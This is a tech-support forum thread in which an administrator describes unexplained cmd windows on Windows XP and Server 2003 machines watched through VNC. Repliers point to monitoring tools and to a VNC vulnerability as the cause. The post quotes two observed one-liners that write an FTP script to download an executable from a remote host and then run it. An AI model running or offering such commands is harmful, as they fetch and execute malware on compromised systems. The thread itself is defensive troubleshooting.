• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 542
  • Last Modified:

cmd opens, runs ftp command and closes

hi all

I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing.   sometimes they open a cmd window with the following commands

cmd.exe /c del i&echo open 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit

ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.

i've already  avg-adaware-spybot-regedit-systedit'ED  those boxes and nothing strange came out,

i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.

i ve seen this in some other computers and im sure im not the only one.

any ideas ?

I hate xp, how can someone run something on a computer that does not have nothing to do with internet ?   the only thing that is internet related in that box is antivirus updating.  

I HATE XP ZILLION Vulnerabilities.

  • 2
  • 2
1 Solution
HTorresAuthor Commented:
Thanks in advance all
These days anything is possible I would be concerned with too, any staff clients trying to hack into the system?
Here is two great tools from systernals
process explorer may assist you
Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

RegMon for Windows v7.04

All Systernal tools

Active Ports is another great little tool it will show which ports are active and you can queiry it and even stop them.

Hope they bring some light to this issue
This is a vulnerability of the VNC.

This PAQ: http:Q_22047347.html
HTorresAuthor Commented:
Merete, great links
thank you!


Ch2, that was it!!!

Ive noticed that this thing only happened in vnc411, the other computers where we have vnc412 are without incidents.

One thing came to my mind.  my ISP is a moron and they have all ports closed (they even tried to close port 25) ... so i can connect from here to other computers via internet, but i cannot connect (from there) to our computers here
How can someone could enter here and exploit a vulnerability and I cannot connect ?

i will take a look at activeports

what port they are using?

thanks glad you like them  
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Train for your Pen Testing Engineer Certification

Enroll today in this bundle of courses to gain experience in the logistics of pen testing, Linux fundamentals, vulnerability assessments, detecting live systems, and more! This series, valued at $3,000, is free for Premium members, Team Accounts, and Qualified Experts.

  • 2
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now